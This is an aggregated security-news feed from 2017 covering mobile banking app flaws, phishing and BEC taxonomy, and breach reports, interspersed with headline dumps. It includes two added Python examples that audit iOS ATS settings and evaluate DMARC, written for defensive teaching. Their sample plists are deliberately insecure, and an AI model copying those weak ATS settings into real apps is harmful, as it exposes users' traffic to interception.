Inside Secure released the newest version of TRNG-IP-76, the company’s true random number generator (TRNG). The CPU is no longer unnecessarily powered, since entropy generation is now completed as a background task. This reduces overall power consumption and saves battery life.
Sparta Consulting releases solution to address information manipulation and integrity
Huginn introduces the capability to provide security by analyzing events in the information assets. As the events are captured, they are analyzed in the corresponding business context and judged as either legitimate business events or as something that needs further analysis or, in the case of immediate security threats, impact prevention. Huginn utilizes the IBA approach. It does not contradict your existing security stack but complements it, co-operating with other solutions by analyzing the events they raise and feeding additional inputs back to them.
WatchGuard’s AP322 brings secure, high-performance Wi-Fi outdoors
WatchGuard announced the AP322, a new high-performance cloud-ready outdoor AP. Sporting a ruggedized IP67 enclosure with 3×3 MIMO and 802.11ac support, it extends the benefits of WatchGuard’s Wi-Fi Cloud to the raw outdoors and is perfect for stadiums, schools, open-air cafes and malls, hotel pool areas and more. The WatchGuard AP322 delivers dual concurrent 5 GHz and 2.4 GHz band radios, with data rates up to 1.3 Gbps and 450 Mbps, respectively.
WISeKeyIoT: PKI framework tailored for the Internet of Things
WISeKeyIoT is a scalable framework, offering digital PKI certificates for connected devices, protected in certified tamper resistant silicon chips, as well as an outsourced or on-premises certificate management system, with device life cycle control functions and security enforcement entities. The digital PKI certificates can be signed by the publicly trusted root, owned by OISTE and operated by WISeKey.
from Help Net Security http://ift.tt/2pFec6Z
IT teams struggle with digital transformation skills
New research conducted by Vanson Bourne aims to uncover how well-placed global IT leaders consider themselves and their teams to be in terms of meeting current and future business demands. Of the six markets surveyed, Germany was found to be the best prepared to meet its digital transformation goals, closely followed by the U.S., while the UK lagged well behind its counterparts.
The research, which surveyed 630 IT leaders in the U.S., UK, France, Germany, Australia, and Singapore, indicates that many organisations are at a tipping point, as new technology demands are set to outstrip the skills supply. Organisations that address this now through additional skills training will be in the strongest position to ensure business growth and competitive advantage.
Overall, an encouraging 74 percent of UK IT leaders acknowledge that IT departments are currently recognised as very important or critical to innovation and business growth. However, almost two thirds (63 percent) predict they will struggle with a lack of IT talent in 12 months. Contributing factors identified from the research include skills shortages, prevalence of outdated skills, lack of commitment to training at the corporate board level, and the rapidly changing technology environment.
“Businesses are approaching the peak of IT strategic influence. Now is the moment that IT teams feel they have the strongest opportunity to influence the transformation of their organisations,” said Christine Heckart, chief marketing officer and senior vice president of ecosystems, Brocade. “However, with a rapidly changing technology landscape and potential impact on international labour markets, it is critical that IT receives the right training to further develop their skills and business relevance.”
The research also found that skills planning had to be aligned with other areas of business planning to avoid the risk of a technology skills deficit, where IT teams are expected to deliver the benefits of technologies that they are ill-equipped to implement.
Staff shortages and outdated skills
Organisations are attempting to move their IT departments away from their traditional roles, but the lack of skills and the time required to learn those skills have held them back. IT decision makers (ITDM) believe this could be a major contributor to their inability to meet business demands, putting organisations at risk of falling behind their competitors and losing customers.
Approximately one in four respondents in Australia, France, Germany, Singapore, and the U.S. claim that they cannot deliver on current business demand due to staff shortages. This number rises to 42 percent in the UK.
Respondents claim that the lack of access to talent will prevent them from implementing new technologies efficiently, lead to a decrease in employee satisfaction, and result in the loss of market share.
The IT skills gap is only likely to get worse
The political landscape is also a contributing factor in the widening skills gap. As market uncertainty intensifies in the next few years, it is more important than ever for IT departments to remain agile and take advantage of new technologies.
- Ninety percent of those questioned in the UK had some level of concern about future hiring of IT staff, while 63 percent were concerned about a lack of skilled talent to choose from.
- Forty-three percent of global respondents agreed or strongly agreed that the current political climate makes it difficult to hire employees with the right skills. In the U.S. and Australia, the numbers were 52 percent and 54 percent, respectively.
- Even with the uncertainty surrounding the Brexit situation, EMEA respondents were less concerned, with only 31 percent of UK ITDMs believing it presented a challenge compared to 39 percent in Germany and 35 percent in France.
Training time and investment will prove to be business-critical
Training continues to be an issue as day-to-day IT maintenance tasks take priority. For organisations to address the technical skills deficit, they first need to invest time and money—or face the consequences.
- There is demand in the UK to spend more time on increasing skills—from 10 percent of time that is currently spent on this to 20 percent.
- Respondents reported that insufficient budget (45 percent) and training time (45 percent) are constraining IT departments’ attempts to develop skills more than any other factors. These were most pronounced in the UK (61% and 50%).
- Currently, only three hours per week are allocated for learning and skills development; for UK respondents this goes down to one hour.
- Seventy percent of UK respondents agree that the key to closing the skills gap would be to spend more money on training.
IT pros need to take control of their future
The research also showed that IT professionals at all levels must take increased responsibility for their own professional destiny, embracing the opportunities delivered by new technologies such as artificial intelligence (AI) and all areas of IoT (from device management to security).
Thirty percent of UK respondents agreed or strongly agreed that their organisation’s IT team does not have the right skills to protect their jobs in the future.
When asked to identify the one skill that they see as critical to their future career progression, cybersecurity was the most frequently cited, by 35 percent of respondents in the UK.
AI could be a friend or foe
AI could revolutionise the IT skills that are required and the way that we work. AI is likely to replace a number of IT roles and tasks, but this doesn’t mean the end for the IT department. Employees need to have the right skills to be in a position to work alongside AI and embrace its future impact, so that organisations can unleash its full potential.
- When asked which current roles were already being replaced by AI in the UK, desktop support (5 percent), data analyst (4 percent), software testers (3 percent) and system architects (4 percent) topped the list. Globally the values were much higher, with 23 percent, 20 percent, 17 percent and 14 percent respectively stating that these roles had already been replaced.
- Within the next 10 years, these numbers are expected to increase in the UK: desktop support (30 percent), data analyst (34 percent), software testers (35 percent), system architects (14 percent), and network engineers (28 percent).
- AI will also impact the role of the CIO, with over a quarter (26 percent) of the UK respondents claiming increased focus from the business.
- Sixty-two percent of respondents believe that developing AI-related skills is key to securing a role in the future.
Vital role of the board in ensuring long-term IT skills development
Organisations’ boards will often dictate whether employees have the time and empowerment to develop their skills, but this is common at organisations that do not have the right support. The boards also have to ensure that skills and training improvements are aligned with other areas of business planning.
- Forty-four percent of respondents think that new skills acquisition is not seen as being as valuable as it should be by the board. This rises to 59 percent in Australia and 50 percent in the UK. The U.S. (42 percent), Germany (41 percent), Singapore (40 percent), and France (34 percent) had slightly more positive results.
- Almost a fifth (16 percent) of UK respondents think their boards view gaining knowledge and skills as a cost to the business, rather than an asset. This rises to 35 percent in Australia.
- Despite respondents (in the UK and globally) claiming that they plan approximately two years in advance for most areas of the business, staffing and recruitment is still on average only planned for a maximum of a year.
- This is creating a disconnect where organisations are attempting to address key IT challenges with teams not as well equipped in terms of skills and experience as they could be.
from Help Net Security http://ift.tt/2qlrT7b
The Slot A Tale of 2 White Bores and Their 2 White Boards | Fusion We Asked ICE About the Prank Call
The Slot A Tale of 2 White Bores and Their 2 White Boards | Fusion We Asked ICE About the Prank Calls to Their Anti-Immigrant Hotline and They Kind of Lost Their Shit | Deadspin How To Suck At Being A Sports Media Critic | The Root People Are Outraged That Obama Got $400,000 as a Speaking Fee |
from Lifehacker http://ift.tt/2qcfNhB
Deadspin An Interview With A Man Who Has Willingly Watched Every Round Of Every NFL Draft Since 1999
Deadspin An Interview With A Man Who Has Willingly Watched Every Round Of Every NFL Draft Since 1999 | Jezebel Caitlyn Says She Hasn’t Spoken to Khloe in ‘Like, Two Years,’ Contradicting Recent KUWTK Episodes | Fusion What the Hell is Going On With Donald Trump and NAFTA? | The Grapevine Man Files Suit Against R. Kelly, Charging He Had Affair With His Wife and Gave Her Chlamydia |
from Lifehacker http://ift.tt/2oAiKLJ
Reading Analytics and Privacy
Interesting paper: "The rise of reading analytics and the emerging calculus of reading privacy in the digital world," by Clifford Lynch:
Abstract: This paper studies emerging technologies for tracking reading behaviors ("reading analytics") and their implications for reader privacy, attempting to place them in a historical context. It discusses what data is being collected, to whom it is available, and how it might be used by various interested parties (including authors). I explore means of tracking what's being read, who is doing the reading, and how readers discover what they read. The paper includes two case studies: mass-market e-books (both directly acquired by readers and mediated by libraries) and scholarly journals (usually mediated by academic libraries); in the latter case I also provide examples of the implications of various authentication, authorization and access management practices on reader privacy. While legal issues are touched upon, the focus is generally pragmatic, emphasizing technology and marketplace practices. The article illustrates the way reader privacy concerns are shifting from government to commercial surveillance, and the interactions between government and the private sector in this area. The paper emphasizes U.S.-based developments.
from Schneier on Security http://ift.tt/2poQhaQ
How secure are mobile banking apps?
Do banking institutions have a good handle on the things they need to remediate and new control layers they need to adopt to keep users secure?
To answer those questions, Accenture and NowSecure have performed vulnerability assessments of customer-facing mobile banking apps of 15 banking institutions in the North American market.
They have tested the iOS and Android app versions of each of these banks, and found that every app they tested had at least one security issue.
“Of the 465 tests completed for banking apps running on Android, 44 or nine percent had low security issues; 48 or 10 percent had medium security issues; and 10 or two percent had high level security issues. For banking apps running on iOS, a total of 315 tests indicated 24 or eight percent low level security issues; 13 or four percent with medium level issues; and none with high level issues,” they noted.
Security risks
Among the security risks identified were:
- World-writable files (i.e. other apps can have write access to the files)
- Broken SSL check / sensitive data in transit (i.e. unencrypted communications). Curiously enough, none of the tested iOS apps had this problem
- Writable executables – a failing that can be combined with other issues and lead to additional app vulnerabilities, including remote code execution ones.
- Lack of obfuscation of the app source code, allowing for easy reverse-engineering (some 60% of the tested Android banking apps are guilty of this)
- Weak SecureRandom implementation
- Dynamic code loading
- Inappropriately set “HttpOnly” flag (to prevent XSS attacks)
- Inappropriately set “Secure” flag (to prevent the sending of cookies over insecure channels)
- TLS traffic with sensitive data (80% of tested iOS banking apps had sensitive values, i.e. username, password, GPS coordinates, etc., intercepted while proxying SSL and Transport Layer Security (TLS) app communications)
- Lack of app transport security (60% of tested iOS banking apps had ATS globally disabled, which allows a connection regardless of HTTP or HTTPS configuration, connection to servers with lower TLS versions and a connection using cipher suites that do not support forward secrecy).
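The last finding is a configuration one, so here is an added example (not from the Accenture/NowSecure assessment or any real banking app) that audits an iOS Info.plist for the ATS weaknesses listed above. The three plist samples are constructed: one with ATS globally disabled, one with a per-domain exception that reopens the same holes, and one hardened configuration; the bank domains are placeholders.

```python
import plistlib
from typing import List

# Constructed Info.plist samples for a hypothetical app; not from any real bank app.
# 1) ATS switched off globally: the state the assessment found in 60% of iOS apps tested.
ATS_GLOBALLY_OFF = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>invalid.example.bank</string>
  <key>NSAppTransportSecurity</key>
  <dict><key>NSAllowsArbitraryLoads</key><true/></dict>
</dict></plist>"""

# 2) ATS left on, but a per-domain exception that quietly permits plain HTTP,
#    TLS 1.0 and non-forward-secret cipher suites for one host.
WEAK_EXCEPTION = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>NSAppTransportSecurity</key>
  <dict>
    <key>NSAllowsArbitraryLoads</key><false/>
    <key>NSExceptionDomains</key>
    <dict><key>legacy.example-bank.invalid</key><dict>
      <key>NSExceptionAllowsInsecureHTTPLoads</key><true/>
      <key>NSExceptionMinimumTLSVersion</key><string>TLSv1.0</string>
      <key>NSExceptionRequiresForwardSecrecy</key><false/>
    </dict></dict>
  </dict>
</dict></plist>"""

# 3) Hardened: ATS on, and the only exception pins the modern settings explicitly.
HARDENED = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>NSAppTransportSecurity</key>
  <dict>
    <key>NSAllowsArbitraryLoads</key><false/>
    <key>NSExceptionDomains</key>
    <dict><key>api.example-bank.invalid</key><dict>
      <key>NSExceptionAllowsInsecureHTTPLoads</key><false/>
      <key>NSExceptionMinimumTLSVersion</key><string>TLSv1.2</string>
      <key>NSExceptionRequiresForwardSecrecy</key><true/>
    </dict></dict>
  </dict>
</dict></plist>"""


def audit_ats(info_plist: bytes) -> List[str]:
    """Return one finding per ATS weakening. An empty list means the ATS
    defaults (HTTPS only, TLS 1.2+, forward-secret cipher suites) apply to
    every host the app talks to."""
    info = plistlib.loads(info_plist)
    ats = info.get("NSAppTransportSecurity")
    findings: List[str] = []
    if not ats:
        return findings  # no dictionary at all: defaults apply
    if ats.get("NSAllowsArbitraryLoads"):
        findings.append("global: NSAllowsArbitraryLoads=true disables ATS for every host")
    for domain, rules in ats.get("NSExceptionDomains", {}).items():
        if rules.get("NSExceptionAllowsInsecureHTTPLoads"):
            findings.append(f"{domain}: plain HTTP permitted")
        min_tls = rules.get("NSExceptionMinimumTLSVersion", "TLSv1.2")
        if min_tls in ("TLSv1.0", "TLSv1.1"):
            findings.append(f"{domain}: minimum TLS lowered to {min_tls}")
        if rules.get("NSExceptionRequiresForwardSecrecy", True) is False:
            findings.append(f"{domain}: forward secrecy not required")
    return findings


if __name__ == "__main__":
    for name, sample in (("globally off", ATS_GLOBALLY_OFF),
                         ("weak exception", WEAK_EXCEPTION),
                         ("hardened", HARDENED)):
        print(name, audit_ats(sample) or ["no ATS findings"])
```

The same check can be run over an extracted .ipa's Info.plist (binary plists load with the same call), which is a cheap pre-release gate for the ATS finding in this list.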
Based on this and other historical app security assessments, the researchers have concluded that banking institutions have been proactive when it came to remediating well-known critical security issues such as Heartbleed, MITM exposure and others, but less so in regards to the above noted security risks.
Many of the institutions have also introduced multi-factor authentication for online banking (a good step), but chose to leverage SMS technology to deliver authentication codes (inherently insecure choice).
Top security risks identified in vulnerability assessment
Tips for mitigating mobile banking security risks
The researchers have flagged insecure communication as the biggest risk.
Security around the transfer of data across communication channels is a challenge for developers, they noted, pointing out that developers are placing too much confidence in secure end-user behavior and back-end server-side communications.
“Development teams should strive to embed security within the end-to-end mobile SDLC (Systems Development Life Cycle), with proper security governance and oversight supported by recurring developer training and awareness and testing,” they concluded.
“Organizations should also have a strategy for performing regular vulnerability and/or configuration assessments, complemented by penetration testing, app fuzzing, and source code reviews, to obtain a comprehensive understanding of the mobile security environment across the entire mobile deployment stack.”
from Help Net Security http://ift.tt/2pp6sFg
Executive spotlight: iovation’s new Vice President of Product
Last week iovation announced that Dwayne Melancon was leaving Tripwire after 17 years and joining the company as the new Vice President of Product, so we decided to get in touch and ask about his future plans.
“My experience at Tripwire ran the gamut – I served in a range of roles, from CTO to product management to head of R&D – but my ultimate goal was to create products that offered both a streamlined user experience and market-leading security protection,” he told us.
This experience will be invaluable, he notes, as iovation shifts from a single product to a portfolio of solutions.
“I’ve spent years working with boards and senior executives, and my philosophy is one of connecting risk and risk mitigation to the entire business, including the boardroom. I plan to work closely with our entire executive team to navigate the convergence of fraud and authentication and guide development of products that connect these two markets,” he added.
“This is a team sport, and the board is part of the winning team in an effective organization. This applies outside of iovation, as well – I’ll take advantage of my experience with C-level executives to work with our customers to help them understand risk in the context of their businesses, and to take business-aligned steps to counteract that risk. After all, the shape of a company’s security investment should match the shape of its risk.”
Infosec innovation
Few areas in IT have grown and evolved as quickly as security in the past few years.
“While all of iovation’s executives are driven by the same mission – to make the internet a safer place for people to do business – VPs in the product space need to not only keep up with the industry but see things ahead of the curve. We need to be able to anticipate trends and create products that satisfy needs that our customers may not even be aware of,” Melancon points out.
The thing with innovation is that it’s viewed through the “eyes of the beholder” and that makes it a challenge for product executives.
“Fortunately, I find that the best way to hit the mark is to consume a lot of data, both on what is happening from a technology perspective, and from connecting with a lot of customers to identify trends in their needs and challenges. My habit is to meet with hundreds of customers each year, and to leverage the data that’s available through community, partnerships, and public information sharing to provide the best opportunity to identify innovation that will connect with customers’ ideas and expectations of value,” he says.
Another important facet is agility – information security changes quickly, and that means solutions providers need to experiment, iterate, and improve continuously. For that, a unique combination of consistency and flexibility is required.
Reducing friction
Yet another challenge is tied to meeting the demands of today’s fast-paced threat landscape. Hackers and fraudsters have become amazingly sophisticated, and they’re able to quickly pivot and adjust course when fraud prevention solutions succeed. They have also become quite good at sharing information with each other, so they can help each other evade the good guys.
“Our biggest challenge is how to continue to outsmart these would-be fraudsters without impacting the user experience. Companies whose products both prevent fraud and reduce user friction for consumers will establish themselves as leaders of the pack — which is why I chose to come to iovation now,” Melancon shared.
“The company is uniting fraud prevention, authentication and a streamlined user experience in a way that’s never been done, and I’m really excited about the opportunity to bridge those competing worlds with unique SaaS-based solutions.”
And, when it comes to information sharing, iovation fights fire with fire – they are leveraging a long-standing community of customers who share information about what the bad guys are doing, so the good guys can stay one step ahead. “That’s unique in the fraud and authentication world,” he concludes.
from Help Net Security http://ift.tt/2qhWLFF
Know your enemy: Defining the new taxonomy of malicious emails
Just as it is the default tool for most businesses, email’s capacity for rapid, mass communication has made it a favourite instrument of criminals. As a result, malicious emails have become a common occurrence in most consumer and business inboxes. Although chances are that most people will correctly identify the most common malicious emails as fraudulent, many will fail to correctly identify sophisticated email attacks as unsafe. Familiarity can breed contempt, and all users are now at risk from increasingly more advanced email attacks, which have become vastly more sophisticated in the last few years.
There have been dozens of recent high-profile thefts and data breaches suffered by organisations that were triggered by malicious emails, with a recent example seeing two multi-national tech companies being stung for more than $100m by a fraudster impersonating a supplier. Both companies were repeatedly fooled by fake invoices, which saw funds wired into shell accounts dotted around the world.
Despite the wide awareness of these high-profile attacks, which leveraged identity deception to trick the intended victims, it is still common for users to have a complacent view of malicious emails, with many people still thinking back to the quaintly inept fraud attempts like the classic Nigerian scam. In addition, even when the threat is addressed, it is often oversimplified. People simply lump all malicious emails together under the label of “phishing” while ignoring the varied tactics used by attackers and the different threats that each type of attack represents. This oversimplification unnecessarily puts people at risk, as it commonly results in a focus on addressing only a portion of the real problem.
In the business world, a lack of awareness of the different types of threats can lead to enterprises focusing in the wrong direction, and on the wrong things. This leaves them vulnerable as they invest money in solutions that won’t protect them from sophisticated attacks that leverage techniques such as identity deception, or which target their victims using custom content. In order to properly protect their employees and customers, companies need to have a thorough understanding of the different attacks, the threats they represent and how they can be prevented.
A phish by any other name
Although phishing has become a catch-all phrase for email-based cyber attacks, the term specifically relates to attempts to trick victims into giving up log-in credentials by impersonating a known and trusted entity, such as a consumer brand or governmental authority. These attacks usually target tens of thousands of potential victims at once, to compensate for the relatively low success rate associated with non-targeted attacks.
Although attackers have traditionally taken a “quantity over quality” approach, we have seen some increasingly sophisticated examples more recently, where attacks have been highly tailored to their intended victims, and subsequently been much more successful. In these more sophisticated attacks, attackers will often enhance their deception with tactics including a spoofed email address, a look-alike-domain or a false identity in the “from field” of the email, and sometimes use obfuscation methods, such as substitutions of letters with identical-looking characters of foreign languages, to evade automated content-based detection methods.
While education can go some way to helping users identify these fakes, a better option is to prevent them from reaching their targets in the first place. Brands and organisations can prevent their own emails from being impersonated with the use of a DMARC (Domain-based Message Authentication, Reporting and Conformance) policy. This protocol is designed to detect and prevent emails from being spoofed by enabling ISPs (Internet Service Providers) to check that incoming mail is authorised by the domain name it is using.
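As an added example that is not part of the article, the receiver-side check DMARC enables, in Python: parse a domain's published policy record and decide a message's disposition from whether SPF or DKIM aligns with the visible From domain. The bank domain, the record and the message outcomes are constructed; the organizational-domain rule is simplified to the last two labels.

```python
from typing import Dict, Optional, Tuple

VALID_POLICIES = ("none", "quarantine", "reject")


def parse_dmarc(record: str) -> Dict[str, str]:
    """Parse a DMARC TXT record ('v=DMARC1; p=reject; ...') into a tag dict,
    filling in the RFC 7489 defaults for alignment mode and pct."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("record must begin with v=DMARC1 and carry a p= policy")
    if tags["p"] not in VALID_POLICIES:
        raise ValueError(f"unknown policy {tags['p']!r}")
    tags.setdefault("adkim", "r")   # relaxed DKIM alignment unless adkim=s
    tags.setdefault("aspf", "r")    # relaxed SPF alignment unless aspf=s
    tags.setdefault("pct", "100")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain. Assumption for this example: the last two labels;
    real receivers consult the Public Suffix List (co.uk and friends)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: Optional[str], mode: str) -> bool:
    """Identifier alignment: does the domain a mechanism authenticated match the
    RFC5322.From domain, exactly (strict) or by organizational domain (relaxed)?"""
    if auth_domain is None:          # that mechanism did not pass at all
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def evaluate(record: str, from_domain: str,
             spf_pass_domain: Optional[str],
             dkim_pass_domain: Optional[str]) -> Tuple[bool, str]:
    """Return (dmarc_pass, disposition) for one message.

    from_domain:      domain in the visible From: header (what the user sees)
    spf_pass_domain:  MAIL FROM domain if SPF returned pass, else None
    dkim_pass_domain: d= of a DKIM signature that verified, else None
    pct= sampling and the sp= subdomain policy are not modelled here."""
    tags = parse_dmarc(record)
    if aligned(from_domain, spf_pass_domain, tags["aspf"]) or \
       aligned(from_domain, dkim_pass_domain, tags["adkim"]):
        return True, "none"
    return False, tags["p"]


# Constructed sample record for a hypothetical bank domain (not a real record).
BANK_RECORD = "v=DMARC1; p=reject; adkim=r; aspf=r; rua=mailto:dmarc@example-bank.invalid"

if __name__ == "__main__":
    # Genuine mail signed by the bank's own mail subdomain: relaxed alignment passes.
    print(evaluate(BANK_RECORD, "example-bank.invalid", None, "mail.example-bank.invalid"))
    # Forged From: SPF passes only for the sending host's own domain, so nothing
    # aligns with the bank and the published p=reject applies.
    print(evaluate(BANK_RECORD, "example-bank.invalid", "unrelated-host.invalid", None))
```

Note the scope: a message from a look-alike domain is judged against that domain's own record, not the brand's, so DMARC stops exact-domain spoofing but not the look-alike and display-name tricks mentioned above, which still need content and sender-identity checks.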
A highly-engineered threat
From an enterprise perspective, a much greater threat is posed by the targeted attacks sometimes referred to as “spear phishing”. In contrast to the type of email attacks explained above, these sophisticated attacks involve emails that are sent to a smaller set of intended victims, with content that has been crafted for high-value targets.
In most cases, these attacks commonly assume the guise of a specific individual who is trusted by the recipient, requesting an action such as a wire transfer or access to confidential information. In the enterprise environment, an attack impersonating a known contact has come to be known as Business Email Compromise (BEC), also frequently referred to as CEO Fraud, as chief execs are one of the most popular identities to assume. BEC attacks carry even more weight, as an email from a senior executive will have most employees scrambling to comply. There have also been several notable cases where the attacker has instead impersonated a supplier or customer.
Whatever the specific methodology, BEC attacks include a high level of social engineering, with attackers researching the company, targeted employee, and relevant connections to manufacture a convincing identity and narrative.
With these attacks, the fraudsters will request confidential data, such as HR records or customer details, but may also seek to directly trick targets into paying into a bank account. In the guise of a CEO, the attacker will usually create a sense of urgency and a reason why they cannot be contacted for normal procedure. In the guise of a partner or supplier, fake invoices can be sent, causing payments to be made to the criminal.
These attacks are particularly dangerous because the traditional email defences that companies have come to rely on over the last decade are almost entirely useless. Most filters rely on indicators of malicious payloads, such as attachments or links, and without these factors there is nothing to distinguish a well-crafted fake email from the genuine article.
Alongside tricking targets into giving up information, email has also become the preferred vector for malware attacks, including the now notorious ransomware. Malware attacks increasingly share traits with BEC attacks, impersonating a senior or trusted authority to trick their target into downloading a file or clicking a link. Once the victim has done this, their machine – and potentially the entire network – will swiftly be compromised. Sophisticated attackers use crypters and other obfuscation tools to circumvent traditional defenses of malicious payloads.
Multi-layered defence
The more one understands malicious emails, the more he or she will realise there is no single catch-all solution that will halt all threats. Instead, firms will need to invest in a multi-layered approach to identify and block attacks. Traditional security and spam filters will continue to play a role in handling the almost endless wave of mass emails, but more sophisticated attacks must be met with equal sophistication. Combining content filtering with the ability to identify and authenticate senders based on their domains will go a long way to keeping a company safe from all levels of threat. By understanding the threats against them, businesses can ensure they have the right combination of defences to protect their employees, customers and their brand.
from Help Net Security http://ift.tt/2qadvCA
Cybercrime can come in any shape or size, and not always the form you’d expect
Cyberespionage is now the most common type of attack seen in manufacturing, the public sector and now education, warns the Verizon 2017 Data Breach Investigations Report. Much of this is due to the high proliferation of proprietary research, prototypes and confidential personal data, which are hot-ticket items for cybercriminals.
Nearly 2,000 breaches were analyzed in this year’s report and more than 300 were espionage-related, many of which started life as phishing emails.
In addition, organized criminal groups escalated their use of ransomware to extort money from victims: this year’s report sees a 50 percent increase in ransomware attacks compared to last year. Despite this increase and the related media coverage surrounding the use of ransomware, many organizations still rely on out-of-date security solutions and aren’t investing in security precautions. In essence, they’re opting to pay a ransom demand rather than to invest in security services that could mitigate against a cyberattack.
Malware is big business
Fifty-one percent of data breaches analyzed involved malware. Ransomware rose to the fifth most common specific malware variety. Ransomware – using technology to extort money from victims – saw a 50 percent increase from last year’s report, and a huge jump from the 2014 DBIR where it ranked 22 in the types of malware used.
Phishing is still a go-to technique
In the 2016 DBIR, Verizon flagged the growing use of phishing techniques linked to software installation on a user’s device. In this year’s report, 95 percent of phishing attacks follow this process. Forty-three percent of data breaches utilized phishing, and the method is used in both cyber-espionage and financially motivated attacks.
Pretexting is on the rise
Pretexting is another tactic on the increase, and the 2017 DBIR showed that it is predominantly targeted at financial department employees – the ones who hold the keys to money transfers. Email was the top communication vector, accounting for 88 percent of financial pretexting incidents, with phone communications in second place with just under 10 percent.
“Cyber-attacks targeting the human factor are still a major issue,” says Bryan Sartin, executive director, Global Security Services, Verizon Enterprise Solutions. “Cybercriminals concentrate on four key drivers of human behavior to encourage individuals to disclose information: eagerness, distraction, curiosity and uncertainty. And as our report shows, it is working, with a significant increase in both phishing and pretexting this year.”
Business sector insights give real-life customer intelligence
This year’s report provides tailored insights for key business sectors, revealing specific challenges faced by different verticals, and also answering the “who? what? why? and how?” for each. Key sector-specific findings include:
- The top three industries for data breaches are financial services (24 percent); healthcare (15 percent) and the public sector (12 percent).
- Companies in the manufacturing industry are the most common targets for email-based malware.
- Sixty-eight (68) percent of healthcare threat actors are internal to the organization.
“The cybercrime data for each industry varies dramatically,” comments Sartin. “It is only by understanding the fundamental workings of each vertical that you can appreciate the cybersecurity challenges they face and recommend appropriate actions.”
Get the basics in place
With 81 percent of hacking-related breaches leveraging either stolen passwords and/or weak or guessable passwords, getting the basics right is as important as ever before. Some recommendations for organizations and individuals alike include:
- Stay vigilant – log files and change management systems can give you early warning of a breach.
- Make people your first line of defense – train staff to spot the warning signs.
- Keep data on a “need to know” basis – only employees that need access to systems to do their jobs should have it.
- Patch promptly – this could guard against many attacks.
- Encrypt sensitive data – make your data next to useless if it is stolen.
- Use two-factor authentication – this can limit the damage that can be done with lost or stolen credentials.
- Don’t forget physical security – not all data theft happens online.
from Help Net Security http://ift.tt/2oyYZEg
Wednesday, April 26, 2017
Modern threat landscape: Seismic shifts in motivation and focus
Cybercriminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the U.S. electoral process by state-sponsored groups, according to Symantec’s Internet Security Threat Report (ISTR), Volume 22.
“New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus,” said Kevin Haley, director, Symantec Security Response. “The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cyber criminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services.”
Subversion and sabotage attacks emerge at the forefront
Cybercriminals are executing politically devastating attacks in a move to undermine a new class of targets. Cyber attacks against the U.S. Democratic Party and the subsequent leak of stolen information reflect a trend toward criminals employing highly-publicized, overt campaigns designed to destabilize and disrupt targeted organizations and countries.
While cyber attacks involving sabotage have traditionally been quite rare, the perceived success of several campaigns – including the U.S. election and Shamoon – points to a growing trend of criminals attempting to influence politics and sow discord in other countries.
Nation states chase the big scores
A new breed of attackers revealed major financial ambitions, which may be an exercise to help fund other covert and subversive activities. Today, the largest heists are carried out virtually, with billions of dollars stolen by cybercriminals. While some of these attacks are the work of organized criminal gangs, for the first time nation states appear to be involved as well. Symantec uncovered evidence linking North Korea to attacks on banks in Bangladesh, Vietnam, Ecuador and Poland.
“This was an incredibly audacious hack as well as the first time we observed strong indications of nation state involvement in financial cybercrime,” said Kevin Haley, director, Symantec Security Response. “While their sights were set even higher, the attackers stole at least US$94 million.”
Attackers weaponize commonly used software
In 2016, Symantec saw cybercriminals use PowerShell, a common scripting language installed on PCs, and Microsoft Office files as weapons. While system administrators may use these common IT tools for daily management tasks, cybercriminals increasingly used this combination for their campaigns as it leaves a lighter footprint and offers the ability to hide in plain sight. Due to the widespread use of PowerShell by attackers, 95 percent of PowerShell files seen by Symantec in the wild were malicious.
The use of email as an infection point also rose, becoming a weapon of choice for cyber criminals and a dangerous threat to users. Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years. Further, BEC scams, which rely on little more than carefully composed spear-phishing emails, scammed more than three billion dollars from businesses over the last three years, targeting over 400 businesses every day.
Caving in to digital extortion
Ransomware continued to escalate as a global problem and a lucrative business for criminals. Symantec identified over 100 new malware families released into the wild, more than triple the amount seen previously, and a 36 percent increase in ransomware attacks worldwide.
However, the United States is firmly in the crosshairs of attackers as the number-one targeted country. Symantec found 64 percent of American ransomware victims are willing to pay a ransom, compared to 34 percent globally. Unfortunately, this has consequences. In 2016, the average ransom spiked 266 percent with criminals demanding an average of $1,077 per victim up from $294 as reported for the previous year.
Cracks in the cloud
A growing reliance on cloud services has left organizations open to attacks. Tens of thousands of cloud databases from a single provider were hijacked and held for ransom in 2016 after users left outdated databases open on the internet without authentication turned on.
Cloud security continues to challenge CIOs. According to Symantec data, CIOs have lost track of how many cloud apps are used inside their organizations. When asked, most assume their organizations use up to 40 cloud apps when in reality the number nears 1,000. This disparity can lead to a lack of policies and procedures for how employees access cloud services, which in turn makes cloud apps riskier. These cracks found in the cloud are taking shape. Symantec predicts that unless CIOs get a firmer grip on the cloud apps used inside their organizations, they will see a shift in how threats enter their environment.
from Help Net Security http://ift.tt/2qadWws
Deadspin A Running List Of ESPN Layoffs | The Muse Isn’t It Relevant That the Star of The Handmaid’s Tale Belongs to a Secretive, Allegedly Oppressive Religion? | Fusion ICE Just Unveiled Its Chilling New Anti-Immigrant Hotline | The Root Ohio Teen Couple Commits Suicide Within Days of Each Other |
from Lifehacker http://ift.tt/2oxTENo
Make Iced Coffee, Sans Ice, With HyperChiller
Qu’est-ce que c’est?
